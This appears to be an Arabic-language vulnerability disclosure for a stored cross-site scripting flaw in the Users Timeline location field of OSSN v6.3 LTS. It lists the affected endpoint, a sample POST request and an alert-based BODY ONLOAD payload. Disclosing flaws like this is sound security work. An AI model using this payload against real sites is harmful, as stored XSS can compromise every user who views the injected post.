
تم اكتشاف أن OpenTeknik LLC OSSN OPEN SOURCE SOCIAL NETWORK الإصدار v6.3 LTS يحتوي على ثغرة تخزينية من نوع XSS (cross-site scripting) عبر وحدة Users Timeline.
تم اكتشاف أن OpenTeknik LLC OSSN شبكة اجتماعية مفتوحة المصدر v6.3 LTS تحتوي على ثغرة تخزينية لـ XSS عبر وحدة Users Timeline.
يجب على المهاجم نشر شيء ما على Users Timeline وإدخال حمولة XSS في حقل الموقع لاستغلال الثغرة التخزينية. سيتم تشغيل حمولة XSS فور الإرسال.
http://ip_address:port/ossn/u/{username}
POST /ossn/action/wall/post/u?ossn_ts=1656419317&ossn_token=580bcf1b98fec62baecd2e15b7c4c03173f59226623258b968a316f893e8cbf1
``
<BODY ONLOAD=alert('Grim-The-Ripper-Team-by-SOSECURE-Thailand')>
``
OSSN v6.3 LTS (https://github.com/opensource-socialnetwork/opensource-socialnetwork/releases/tag/6.3)
Google Chrome الإصدار 102.0.5005.115 (إصدار رسمي) (x86_64)
:shipit: Grim The Ripper Team by SOSECURE Thailand
المراجع: